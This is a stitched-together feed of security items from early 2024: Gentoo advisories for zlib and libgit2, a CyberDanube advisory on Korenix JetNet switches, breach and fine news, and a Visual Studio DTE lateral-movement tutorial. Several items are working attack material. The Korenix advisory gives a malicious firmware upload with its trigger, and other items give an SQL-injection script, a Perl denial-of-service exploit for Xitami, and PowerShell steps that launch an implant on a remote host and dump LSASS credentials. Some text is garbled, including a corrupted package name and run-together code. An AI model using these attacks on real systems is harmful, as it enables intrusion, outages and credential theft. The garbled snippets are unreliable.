Gentoo Linux Security Advisory 202401-18 - A vulnerability has been found in zlib that can lead to a heap-based buffer overflow. Versions greater than or equal to 1.2.13-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-18  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: zlib: Buffer Overflow  
     Date: January 15, 2024  
     Bugs: #916484  
       ID: 202401-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in zlib that can lead to a heap-based  
buffer overflow.

Background  
=========  
zlib is a widely used free and patent unencumbered data compression  
library.

Affected packages  
================  
Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
sys-libs/zlib  < 1.2.13-r2   >= 1.2.13-r2

Description  
==========  
A vulnerability has been discovered in zlib. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
MiniZip in zlib through 1.3 has an integer overflow and resultant heap-  
based buffer overflow in ZipOpenNewFileInZip4_64 via a long filename,  
comment, or extra field.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All zlib users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-libs/zlib-1.2.13-r2"

References  
=========  
[ 1 ] CVE-2023-45853  
      https://nvd.nist.gov/vuln/detail/CVE-2023-45853

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-18

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-18

Gentoo Linux Security Advisory 202401-17 - A vulnerability has been found in libgit2 which could result in privilege escalation. Versions greater than or equal to 1.4.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: libgit2: Privilege Escalation Vulnerability  
     Date: January 14, 2024  
     Bugs: #857792  
       ID: 202401-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in libgit2 which could result in  
privilege escalation.

Background  
=========  
libgit2 is a portable, pure C implementation of the Git core methods  
provided as a re-entrant linkable library with a solid API.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
dev-libs/libgit2  < 1.4.4       >= 1.4.4

Description  
==========  
A vulnerability has been discovered in libgit2. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
Usages of a malicious crafted Git repository could allow the creator of  
the repository to elevate privileges to those of the user accessing the  
repository.

Workaround  
=========  
Administrators can ensure that their usages of libgit2 only interact  
with repositories which have only been modified by trusted users.

Resolution  
=========  
All libgit2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-libs/libgit2-1.4.4"

References  
=========  
[ 1 ] CVE-2022-29187  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29187

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-17

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-17

Korenix JetNet Series allows TFTP without authentication and also allows for unauthenticated firmware upgrades.

    CyberDanube Security Research 20240109-0-------------------------------------------------------------------------------                title| Multiple Vulnerabilities              product| Korenix JetNet Series   vulnerable version| See "Vulnerable versions"        fixed version| -           CVE number| CVE-2023-5376, CVE-2023-5347               impact| High             homepage| https://www.korenix.com/                found| 2023-08-31                   by| S. Dietz (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"Korenix Technology, a Beijer group company within the Industrial Communicationbusiness area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.With decades of experiences in the industry, we have developed various productlines [...].Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customerbase covers different Sales channels, including end-customers, OEMs, systemintegrators, and brand label partners. [...]"Source: https://www.korenix.com/en/about/index.aspx?kind=3Vulnerable versions-------------------------------------------------------------------------------Tested on emulated Korenix JetNet 5310G / v2.6All vulnerable models/versions according to vendor:JetNet 4508 (4508i-w V1.3, 4508 V2.3, 4508-w V2.3)JetNet 4508f, 4508if (4508if-s V1.3,4508if-m V1.3, 4508if-sw V1.3,       4508if-mw V1.3, 4508f-m V2.3, 4508f-s V2.3, 4508f-mw V2.3,       4508f-sw V2.3)JetNet 5620G-4C V1.1JetNet 5612GP-4F V1.2JetNet 5612G-4F V1.2JetNet 5728G (5728G-24P-AC-2DC-US V2.1, 5728G-24P-AC-2DC-EU V2.0)JetNet 528Gf (6528Gf-2AC-EU V1.0, 6528Gf-2AC-US V1.0, 6528Gf-2DC24 V1.0,       6528Gf-2DC48 V1.0, 6528Gf-AC-EU V1.0, 6528Gf-AC-US V1.0)JetNet 6628XP-4F-US V1.1JetNet 6628X-4F-EU V1.0JetNet 6728G (6728G-24P-AC-2DC-US V1.1, 6728G-24P-AC-2DC-EU V1.1)JetNet 6828Gf (6828Gf-2DC48 V1.0, 6828Gf-2DC24 V1.0, 6828Gf-AC-DC24-US V1.0,       6828Gf-2AC-US V1.0, 6828Gf-AC-US V1.0, 6828Gf-2AC-AU V1.0,       6828Gf-AC-DC24-EU V1.0, 6828Gf-2AC-EU V1.0)JetNet 6910G-M12 HVDC V1.0JetNet 7310G-V2 2.0JetNet 7628XP-4F-US V1.0, 7628XP-4F-US V1.1, 7628XP-4F-EU V1.0,       7628XP-4F-EU V1.1JetNet 7628X-4F-US V1.0, 7628X-4F-EU V1.0JetNet 7714G-M12 HVDC V1.0Vulnerability overview-------------------------------------------------------------------------------1) TFTP Without Authentication (CVE-2023-5376)The available tftp service is accessable without user authentication. Thisallows the user to upload and download files to the restricted "/home" folder.2) Unauthenticated Firmware Upgrade (CVE-2023-5347)A critical security vulnerability has been identified that may allow anunauthenticated attacker to compromise the integrity of a device or cause adenial of service (DoS) condition. This vulnerability resides in the firmwareupgrade process of the affected system.Proof of Concept-------------------------------------------------------------------------------1) TFTP Without Authentication (CVE-2023-5376)The Linux tftp client was used to upload a firmware to the absolute path"/home/firmware.bin":# tftp $IPtftp> put exploit.bin /home/firmware.binSent 5520766 bytes in 5.7 seconds2) Unauthenticated Firmware Upgrade (CVE-2023-5347)Unauthenticated attackers can exploit this by uploading malicious firmware viaTFTP and initializing the upgrade process with a crafted UDP packet on port5010.We came to the conclusion that the firmware image consists of multiplesections. Our interpretation of these can be seen below:===============================================================================class FirmwarePart:    def init(self, name, offset, size):        self.name = name        self.offset = offset        self.size = sizefirmware_parts = [    FirmwarePart("uimage_header", 0x0, 0x40),    FirmwarePart("uimage_kernel", 0x40, 0x3c54),    FirmwarePart("gzip", 0x3c94, 0x14a000 - 0x3c94),    FirmwarePart("squashfs", 0x14a000, 0x539000 - 0x14a000),    FirmwarePart("metadata", 0x539000, 5480448 - 0x539000),]===============================================================================The squashfs includes the rootfs. Metadata includes a 4 byte checksum whichneeds to be modified when repacked. During our analysis we observed that thechecksum gets calculated over all sections except metadata. To test thisvulnerability we reimplemented the checksum calculation at offset 0x9bdc inthe binary "/bin/cmd-server2":===============================================================================#include <stdio.h>#include <stdint.h>#include <stdlib.h>int32_t check_file(const char* arg1) {    FILE* r0 = fopen(arg1, "rb");    if (!r0) {        return 0xffffffff;    }    int32_t filechecksum = 0;    int32_t last_data_size = 0;    int32_t file_size = 0;    uint8_t data_buf[4096];    int32_t data_len = 1;    while (data_len > 0) {        data_len = fread(data_buf, 1, sizeof(data_buf), r0);        if (data_len == 0) {            break;        }        int32_t counter = 0;        while (counter < (data_len >> 2)) {            int32_t byte_at_counter = *((int32_t*)(data_buf + (counter << 2)));            counter++;            filechecksum += byte_at_counter;        }        file_size += data_len;        last_data_size = data_len;    }    fclose(r0);    if (last_data_size < 0x400 || (last_data_size >= 0x400 && (file_size - 0x14a  000) > 0x5ac000)) {        return 0xffffffff;    }    data_len = 0;    while (data_len < (last_data_size >> 2)) {        int32_t r3_2 = *((int32_t*)(data_buf + (data_len << 2)));        data_len++;        filechecksum -= r3_2;    }    return filechecksum;}int main(int argc, char* argv[]) {    if (argc != 2) {        printf("Usage: %s <file_path>\n", argv[0]);        return 1;    }    int32_t result = check_file(argv[1]);    printf("0x%x\n", result);    return 0;}===============================================================================After modifying and repacking the squashfs, we calculated the checksum,patched the required bytes in the metadata section (offset 0x11b-0x11e) andinitilized the update process.===============================================================================# tftp $IPtftp> put exploit.bin /home/firmware.binSent 5520766 bytes in 5.7 seconds# echo -e "\x00\x00\x00\x1f\x00\x00\x00\x01\x01" | nc -u $IP 5010===============================================================================The output of the serial console can be observed below:===============================================================================Jan  1 00:01:00 Jan  1 00:01:00 syslog: UDP cmd is receivedJan  1 00:01:00 Jan  1 00:01:00 syslog: management vlan = sw0.0Jan  1 00:01:00 Jan  1 00:01:00 syslog: setsockopt(SO_BINDTODEVICE) No such deviJan  1 00:01:00 Jan  1 00:01:00 syslog: tlv_count = 0Jan  1 00:01:00 Jan  1 00:01:00 syslog: rec_bytes = 10Jan  1 00:01:00 Jan  1 00:01:00 syslog: command TLV_FW_UPGRADE receivedcheck firmware...checksum=b2256313, inFileChecksum=b2256313Firmware upgrading, don't turn off the switch!Begin erasing flash:.Write firmware.bin (5480448 Bytes) to flash:...Write finished...Terminating child processes...Jan  1 00:01:01 Jan  1 00:01:01 syslog: first time create tlv_chainJan  1 00:01:01 syslogd exitingFirmware upgrade success!!waiting for reboot command .......===============================================================================The vulnerabilities were manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------Beijer/Korenix provided a workaround to mitigate the vulnerabilities until aproper patch is available (see "Workaround" section).Workaround-------------------------------------------------------------------------------Beijer representatives provided the following workaround for mitigating thevulnerabilities on devices of the JetNet series:"Login by terminal:Switch# configure terminalSwitch(config)# service ipscan disableSwitch(config)# tftpd disableSwitch(config)# copy running-config startup-config"Source: https://www.beijerelectronics.com/en/support/Help___online?docId=69947This commands should be used to deactivate the TFTP daemon on the device toprevent unauthenticated actors from abusing the service.Recommendation-------------------------------------------------------------------------------Regardless to the current state of the vulnerability, CyberDanube recommendscustomers from Korenix to upgrade the firmware to the latest version available.Furthermore, a full security review by professionals is recommended.Contact Timeline-------------------------------------------------------------------------------31-08-2023: Contacting Beijer Electronics Group via cs@beijerelectronics.com.31-08-2023: Receiving contact information. Send vulnerability information.26-09-2023: Asking about vulnerability status and receiving update release date.27-10-2023: Received update from contact regarding the firmware update.29-11-2023: Meeting with contact stating that it effects the whole series.31-11-2023: Meeting to discuss potential solutions.11-12-2023: Release delayed due to lack of workaround from manufacturer.21-12-2023: Manufacturer provides workaround. Release date confirmed.09-01-2024: Coordinated release of security advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF Sebastian Dietz / @2024

Korenix JetNet Series Unauthenticated Access

WordPress RSVPMaker plugin versions 9.3.2 and below suffer from a remote SQL injection vulnerability.

    #!/bin/bash# Set the URL of the website running the vulnerable pluginurl="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php"# Set the number of columns in the querycolumns=5response=$(curl -s "$url")query=$(echo "$response" | grep -oP 'FROM .* WHERE .*')payload="' UNION SELECT 1,2,3,4,5-- "# Test the query with different numbers of columnsfor i in $(seq 1 $columns)do  query_with_payload="${query%?*}?${payload:0:i}${query#*?}"  curl -s -X POST -d "$query_with_payload" "$url" | grep -q "Wordfence Security Error"  if [ $? -eq 0 ]  then    echo "Vulnerability confirmed with $i columns"    break  fidone

WordPress RSVPMaker 9.3.2 SQL Injection

Fidelity National Financial has suffered a ransomware attack and resulting data breach which involved 1.3 million of its customers' data.

In November 2023, real estate services company Fidelity National Financial (FNF) got its systems knocked offline for a week after a cyberincident.

As is often the case these days, it turns out that the cyberincident was very likely a ransomware attack that included a data breach. Ransomware operators typically steal data from the compromised systems to use as extra leverage against the victim.

The attack on FNF was claimed by ransomware group ALPHV/BlackCat on its leak site. ALPHV is typically in the top five most active ransomware gangs in our monthly ransomware reviews and is one of the most dangerous ransomware groups in the world.

The listing on ALPHV’s leak site has since been removed which might indicate that the ransom was paid. But it could also be another reason: In December 2023, the gang’s infrastructure was taken down by law enforcement. Unfortunately the gang did re-appear soon after.

In a form 8-K, FNF said it had notified applicable state attorneys general and regulators, and approximately 1.3 million potentially impacted consumers. Form 8-K is known as a “current report” and it is the report that companies must file with the SEC to announce major events that shareholders should know about.

The company has not so far specified the type of data that may have been stolen. FNF is providing credit monitoring and identity theft services to affected customers.

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using Malwarebytes Identity Theft Protection.

 Fidelity National Financial acknowledges data breach affecting 1.3 million customers 

Xitami version 2.5 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Xitami 2.5 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 14 january 2024  
# Vendor Homepage: https://imatix-legacy.github.io/xitami.com/  
# Download to demo: https://drive.google.com/file/d/1Uw9fCQ9T3IBqn53pS2lETUCM6zzYDSb8/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Xitami 2.5   
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=tutFcL3Gh8I

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to webserver.  
#The following request sends a large amount of data to the webserver to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

    $exploit  = "A"*939;

if ($socket = IO::Socket::INET->new  
   (PeerAddr => $ip,  
   PeerPort => $port,   
   Proto => "TCP"))

       {   
    $header =  
    "GET / HTTP/1.1\r\n".  
    "Host: ".$target." \r\n".  
    "If-Modified-Since: AAAAAAAAAAAAA "." $exploit\r\n";

    print $socket $header."\r\n";  
    sleep(1);  
    close($socket);  
    }

else  
  {  
  print "[-] Connection to $target failed!\n";  
  } 

            print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

     _________  
    |         |  
    | Exploit |==( )    //////  
    |_________|   |||   | o o|                   
                    ||| ( c  )                  ____  
                     ||| \= /                  ||   \_  
                      ||||||                   ||     |  
                      ||||||                ...||__/|-"  
                      ||||||             __|________|__  
                        |||             |______________|  
                        |||             || ||      || ||  
                        |||             || ||      || ||  
      ------------|||-------------||-||------||-||-------  
                        |__>            || ||      || ||          

                              [+] Xitami 2.5 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

Xitami 2.5 Denial Of Service

By Waqas
If you’re a HelloFresh customer, you’ll likely receive fewer marketing emails and texts due to the fine imposed…
This is a post from HackRead.com Read the original post: HelloFresh Fined £140,000 for 80 Million Spam Messages

If you’re a HelloFresh customer, you’ll likely receive fewer marketing emails and texts due to the fine imposed by the UK’s Information Commissioner’s Office (ICO).

****_Key Points_****

*   **Customers were bombarded with unwanted emails and texts.**
*   **HelloFresh fined £140,000 for sending 80 million spam messages.**
*   **ICO found HelloFresh’s opt-in processes were misleading and confusing.**
*   **Case highlights the importance of data protection and obtaining informed consent.**

Recipe kit delivery service HelloFresh has been slapped with a hefty £140,000 fine by the UK’s Information Commissioner’s Office (ICO) for bombarding customers with a staggering 80 million spam messages.

The fine follows a year-long investigation triggered by a flood of complaints from customers who were fed up with the constant barrage of unwanted marketing emails and texts.

The ICO found that HelloFresh’s marketing practices were a clear violation of UK data protection regulations. Between August 2022 and February 2023, the company sent out a mind-boggling 79 million emails and 1 million text messages without obtaining proper consent from its customers. This included bombarding customers who had signed up for the service solely to receive recipe kits, with irrelevant offers and promotions.

“This was a clear case of a company putting its own commercial interests ahead of the privacy and rights of its customers,” said Andy Curry, Head of Investigations at the ICO. “Customers were not given a clear choice about receiving marketing messages, and many were left feeling harassed and frustrated by the constant bombardment.”

The ICO’s investigation revealed that HelloFresh’s opt-in processes were designed to be confusing and misleading. Customers were often pre-checked into marketing lists without their knowledge, and the wording of opt-in boxes was unclear, making it difficult for customers to understand what they were agreeing to.

“We take our data protection obligations very seriously and have made changes to our email and text marketing policy in response to the ICO’s findings,” said a spokesperson for HelloFresh. However, the company’s apology and belated changes to its marketing practices may not be enough to appease customers who feel they have been taken advantage of.

The HelloFresh case highlights the importance of data protection and the need for businesses to obtain clear and informed consent from customers before sending them marketing messages. Companies that fail to comply with data protection regulations face not only hefty fines but also reputational damage and the potential loss of customer trust.

****_RELATED ARTICLES_****

1.  **Unreleased Music Stolen and Sold on Dark Web: Hacker Fined**
2.  **Meta Fined €265 million in Facebook Data Scraping Case in the EU**
3.  **Sephora Fined $1.2 Million for Breaching CCPA and Selling User Data**
4.  **Apple, Samsung fined for intentionally slowing down old smartphones**
5.  **Signal, AI Generated Art Least, Amazon, Facebook Most Invasive Apps**

HelloFresh Fined £140,000 for 80 Million Spam Messages

Multiple security vulnerabilities have been disclosed in Bosch BCC100 thermostats and Rexroth NXA015S-36V-B smart nutrunners that, if successfully exploited, could allow attackers to execute arbitrary code on affected systems.
Romanian cybersecurity firm Bitdefender, which discovered the flaw in Bosch BCC100 thermostats last August, said the issue could be weaponized by an attacker to

Operational Technology / Network Security

Multiple security vulnerabilities have been disclosed in Bosch BCC100 thermostats and Rexroth NXA015S-36V-B smart nutrunners that, if successfully exploited, could allow attackers to execute arbitrary code on affected systems.

Romanian cybersecurity firm Bitdefender, which discovered the flaw in Bosch BCC100 thermostats last August, said the issue could be weaponized by an attacker to alter the device firmware and implant a rogue version.

Tracked as CVE-2023-49722 (CVSS score: 8.3), the high-severity vulnerability was addressed by Bosch in November 2023.

"A network port 8899 is always open in BCC101/BCC102/BCC50 thermostat products, which allows an unauthenticated connection from a local WiFi network," the company said in an advisory.

The issue, at its core, impacts the WiFi microcontroller that acts as a network gateway for the thermostat's logic microcontroller.

By exploiting the flaw, an attacker could send commands to the thermostat, including writing a malicious update to the device that could either render the device inoperable or act as a backdoor to sniff traffic, pivot onto other devices, and other nefarious activities.

Bosch has corrected the shortcoming in firmware version 4.13.33 by closing the port 8899, which it said was used for debugging purposes.

The German engineering and tech company has also been made aware of over two dozen flaws in Rexroth Nexo cordless nutrunners that an unauthenticated attacker could abuse to disrupt operations, tamper with critical configurations, and even install ransomware.

"Given that the NXA015S-36V-B is certified for safety-critical tasks, an attacker could compromise the safety of the assembled product by inducing suboptimal tightening, or cause damage to it due to excessive tightening," Nozomi Networks said.

The flaws, the operational technology (OT) security firm added, could be used to obtain remote execution of arbitrary code (RCE) with root privileges, and make the pneumatic torque wrench unusable by hijacking the onboard display and disabling the trigger button to demand a ransom.

"Given the ease with which this attack can be automated across numerous devices, an attacker could swiftly render all tools on a production line inaccessible, potentially causing significant disruptions to the final asset owner," the company added.

Patches for the vulnerabilities, which impact several NXA, NXP, and NXV series devices, are expected to be shipped by Bosch by the end of January 2024. In the interim, users are recommended to limit the network reachability of the device as much as possible and review accounts that have login access to the device.

The development comes as Pentagrid identified several vulnerabilities in Lantronix EDS-MD IoT gateway for medical devices, one which could be leveraged by a user with access to the web interface to execute arbitrary commands as root on the underlying Linux host.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

High-Severity Flaws Uncovered in Bosch Thermostats and Smart Nutrunners

Thousands of WordPress sites using a vulnerable version of the Popup Builder plugin have been compromised with a malware called Balada Injector.
First documented by Doctor Web in January 2023, the campaign takes place in a series of periodic attack waves, weaponizing security flaws WordPress plugins to inject backdoor designed to redirect visitors of infected sites to bogus tech

Website Security / Vulnerability

Thousands of WordPress sites using a vulnerable version of the Popup Builder plugin have been compromised with a malware called **Balada Injector**.

First documented by Doctor Web in January 2023, the campaign takes place in a series of periodic attack waves, weaponizing security flaws WordPress plugins to inject backdoor designed to redirect visitors of infected sites to bogus tech support pages, fraudulent lottery wins, and push notification scams.

Subsequent findings unearthed by Sucuri have revealed the massive scale of the operation, which is said to have been active since 2017 and infiltrated no less than 1 million sites since then.

The GoDaddy-owned website security company, which detected the latest Balada Injector activity on December 13, 2023, said it identified the injections on over 7,100 sites.

These attacks take advantage of a high-severity flaw in Popup Builder (CVE-2023-6000, CVSS score: 8.8) – a plugin with more than 200,000 active installs – that was publicly disclosed by WPScan a day before. The issue was addressed in version 4.2.3.

"When successfully exploited, this vulnerability may let attackers perform any action the logged‑in administrator they targeted is allowed to do on the targeted site, including installing arbitrary plugins, and creating new rogue Administrator users," WPScan researcher Marc Montpas said.

The ultimate goal of the campaign is to insert a malicious JavaScript file hosted on specialcraftbox\[.\]com and use it to take control of the website and load additional JavaScript in order to facilitate malicious redirects.

Furthermore, the threat actors behind Balada Injector are known to establish persistent control over compromised sites by uploading backdoors, adding malicious plugins, and creating rogue blog administrators.

This is often accomplished by using the JavaScript injections to specifically target logged-in site administrators.

"The idea is when a blog administrator logs into a website, their browser contains cookies that allow them to do all their administrative tasks without having to authenticate themselves on every new page," Sucuri researcher Denis Sinegubko noted last year.

"So, if their browser loads a script that tries to emulate administrator activity, it will be able to do almost anything that can be done via the WordPress admin interface."

The new wave is no exception in that if logged-in admin cookies are detected, it weaponizes the elevated privileges to install and activate a rogue backdoor plugin ("wp-felody.php" or "Wp Felody") so as to fetch a second-stage payload from the aforementioned domain.

The payload, another backdoor, is saved under the name "sasas" to the directory where temporary files are stored, and is then executed and deleted from disk.

"It checks up to three levels above the current directory, looking for the root directory of the current site and any other sites that may share the same server account," Sinegubko said.

"Then, in the detected site root directories, it modifies the wp-blog-header.php file to inject the same Balada JavaScript malware as was originally injected via the Popup Builder vulnerability."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Balada Injector Infects Over 7,100 WordPress Sites Using Plugin Vulnerability

A lot of organizations have some sort of application development program and it is highly likely that developers will utilize Visual Studio for their development… 
Continue reading → Lateral Movement – Visual Studio DTE

Skip to content

A lot of organizations have some sort of application development program and it is highly likely that developers will utilize Visual Studio for their development needs. Outside of the risk of from malicious _.sln_ files which doesn’t apply Mark of the Web (MotW) and therefore can evade Microsoft controls such as SmartScreen, Visual Studio also provides an opportunity for lateral movement via the Development Tools Environment (DTE). Juan Manuel Fernandez disclosed this technique to the public.

Visual Studio Development Tools Environment (DTE) is a COM library which enables developers to interact with the operating system and extend the functionality of Visual Studio. In order to use DTE for remote command execution the class ID of the visual studio installation needs to be retrieved from the registry.

Get-Item -Path Registry::HKEY\_CLASSES\_ROOT\\VisualStudio.DTE.17.0\\CLSID

Visual Studio DTE – Registry CLSID

The local administrator credentials can be used from a PowerShell session by executing the following commands:

$Credential = Get-Credential
$Credential.UserName

The retrieved _CLSID_ can be used in order to initiate a COM communication with the target host. Using the debugger it is feasible to enumerate the processes running on the target host.

$com = \[System.Activator\]::CreateInstance(\[type\]::GetTypeFromCLSID("33ABD590-0400-4FEF-AF98-5F5A8A99CFC3","10.0.0.2"))
$list = $com.Debugger.LocalProcesses
$list | ForEach-Object {$\_.Name + " - " + $\_.ProcessID}

Visual Studio DTE – Processes Enumeration

It is also possible to launch executable applications within Visual Studio using _Tools.Shell_.

$com = \[System.Activator\]::CreateInstance(\[type\]::GetTypeFromCLSID("33ABD590-0400-4FEF-AF98-5F5A8A99CFC3","10.0.0.2"))
$com.ExecuteCommand("Tools.Shell", "cmd.exe /c echo PWNED! > c:\\dcom.txt")
type \\\\10.0.0.2\\C$\\dcom.txt

Visual Studio DTE – Command Execution

Of course during red team operations an implant can be executed in order to establish a Command & Control communication.

$com.ExecuteCommand("Tools.Shell", "cmd.exe /c C:\\tmp\\demon.x64.exe")

Visual Studio DTE – Implant Execution

Visual Studio DTE – Implant

From the implant it is now feasible to dump the LSASS process in order to retrieve any cached credentials stored that would potentially allow to move laterally into other systems within the domain.

LSASS Dumping

**Post navigation**

Tag

#web